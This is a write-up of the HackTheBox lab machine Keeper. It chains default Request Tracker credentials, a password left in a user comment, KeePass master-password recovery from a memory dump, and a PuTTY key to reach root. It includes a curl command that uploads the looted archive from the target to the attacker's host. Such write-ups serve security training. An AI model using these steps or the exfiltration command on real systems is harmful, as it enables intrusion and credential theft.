Default credentials and a comment field that should never have held a password - two very human mistakes that open the door all the way to root.

Machine info

NameKeeper
PlatformHackTheBox
OSLinux
DifficultyEasy

TL;DR

  • Web server redirects to tickets.keeper.htb running Request Tracker (RT) - default credentials (root:password) work
  • A user profile comment reads “Initial password set to Welcome2023!” - SSH access as lnorgaard
  • Home directory contains RT30000.zip with a KeePass dump and .kdbx file
  • keepass_dump recovers a partial master password; context clues complete it
  • KeePass vault holds a PuTTY SSH key for root - convert and log in

Recon

Nmap

1

nmap -sV -sC -Pn -A 10.129.229.41

Nmap results

Ports 22 (SSH) and 80 (HTTP). Nginx 1.18.0 on Ubuntu.

Enumeration

Request Tracker

Visiting the IP redirects immediately:

Browser showing tickets.keeper.htb redirect

After adding keeper.htb and tickets.keeper.htb to /etc/hosts, the login page loads:

RT login page

A quick search for the default credentials of Best Practical’s Request Tracker:

RT default credentials: root / password

root:password - and it works. Once in, browsing the Users tab reveals a user named lnorgaard. Inside her profile, the Comments field has a message left by an admin:

User profile comment with Welcome2023! password

“New user. Initial password set to Welcome2023!” - a classic ITSM footgun.

Foothold

SSH as lnorgaard

1

ssh lnorgaard@keeper.htb

SSH login as lnorgaard

Inside the home directory:

Home directory listing and user.txt

user.txt and RT30000.zip. The zip is the interesting one.

Privilege Escalation

KeePass dump analysis

Unzipping the archive:

Unzipping RT30000.zip

Two files: KeePassDumpFull.dmp (a memory dump) and passcodes.kdbx (the KeePass database). Transfer them to Kali:

Uploading RT30000.zip to Kali

1
2
3
4
5

# on the target
curl -X POST 10.10.14.208/upload -F "files=@RT30000.zip" --insecure

# on Kali - simple upload receiver
python3 -m uploadserver

Using keepass_dump to extract the master password from the memory dump:

keepass_dump partial output

The tool recovers most characters but the first one is marked {UNKNOWN}. The extracted fragment reads: {UNKNOWN}dgrd med flde.

Recovering the missing character

That looks like it could be a word in a foreign language. Searching for it:

Google showing Rodgrod med flode

“Rodgrod med flode” - a traditional Danish dessert. The lnorgaard user profile listed her language as Danish. The full master password is rødgrød med fløde.

Opening the KeePass vault

1

keepass2 passcodes.kdbx

KeePass2 opening the database

KeePass database contents showing PuTTY key for root

The database has an entry for root on keeper.htb with a PuTTY-format SSH private key in the notes field.

Converting PuTTY key to OpenSSH and logging in

PuTTY keys (.ppk) are not directly usable with OpenSSH. Convert it first:

1

puttygen id_rsa -O private-openssh -o id_rsa2

puttygen conversion and root SSH login

1

ssh root@keeper.htb -i id_rsa2

Root shell.

Takeaways (for OSCP)

  • Default credentials on internal tooling are almost always worth trying. Request Tracker, Gitea, Grafana, phpMyAdmin - they all ship with documented defaults and admins often forget to change them.
  • Comment/description fields in user management systems leak credentials constantly. In real engagements, HR and IT portals are a goldmine for this.
  • Memory dumps of running applications can yield credentials. KeePass CVE-2023-32784 is patched now, but the technique - dumping a process and searching for secrets in memory - applies broadly.
  • PuTTY keys are a format mismatch trap. puttygen is the conversion tool; remember it for exams.

References